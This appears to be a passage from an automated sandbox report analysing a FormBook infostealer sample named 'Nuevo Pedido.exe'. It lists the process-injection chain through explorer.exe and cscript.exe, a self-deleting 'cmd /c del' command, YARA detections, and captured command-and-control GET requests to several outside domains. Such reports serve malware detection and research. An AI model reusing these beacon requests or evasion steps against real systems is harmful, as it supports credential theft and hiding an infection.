                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 63 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 72 63 65 70 6a 6f 62 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 38 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 63 65 70 6a 6f 62 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7<html>9 <head>4c <meta http-equiv='refresh' content='5; url=http://www.rcepjobs.com/' />a </head>9 <body>38 You are being redirected to http://www.rcepjobs.coma </body>8</html>0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.549816209.17.116.16380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:49.310664892 CET15995OUTGET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.downingmunroe.online
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:49.426548958 CET15996INHTTP/1.1 400 Bad Request
                                Server: openresty/1.17.8.2
                                Date: Thu, 25 Nov 2021 14:10:49 GMT
                                Content-Type: text/html
                                Content-Length: 163
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.549838192.232.250.14780C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:59.895478964 CET16019OUTGET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.thejohnmatt.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:01.556123972 CET16020INHTTP/1.1 301 Moved Permanently
                                Date: Thu, 25 Nov 2021 14:11:01 GMT
                                Server: nginx/1.17.9
                                Content-Type: text/html; charset=UTF-8
                                Content-Length: 0
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Location: http://thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN
                                X-Endurance-Cache-Level: 0
                                X-nginx-cache: WordPress
                                X-Server-Cache: true
                                X-Proxy-Cache: MISS


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                4192.168.2.549839185.53.179.9180C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:11:10.615487099 CET16021OUTGET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.onlinedatingthaiweb.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:10.632399082 CET16021INHTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:11:10 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: Nuevo Pedido.exe PID: 6320 Parent PID: 572

                                General

                                Start time:15:09:07
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0xa80000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Analysis Process: Nuevo Pedido.exe PID: 6464 Parent PID: 6320

                                General

                                Start time:15:09:10
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Imagebase:0xde0000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Analysis Process: explorer.exe PID: 3472 Parent PID: 6464

                                General

                                Start time:15:09:12
                                Start date:25/11/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Analysis Process: cscript.exe PID: 6536 Parent PID: 3472

                                General

                                Start time:15:09:37
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                Imagebase:0xa50000
                                File size:143360 bytes
                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                Analysis Process: cmd.exe PID: 6420 Parent PID: 6536

                                General

                                Start time:15:09:44
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Analysis Process: conhost.exe PID: 6668 Parent PID: 6420

                                General

                                Start time:15:09:45
                                Start date:25/11/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                Reset < >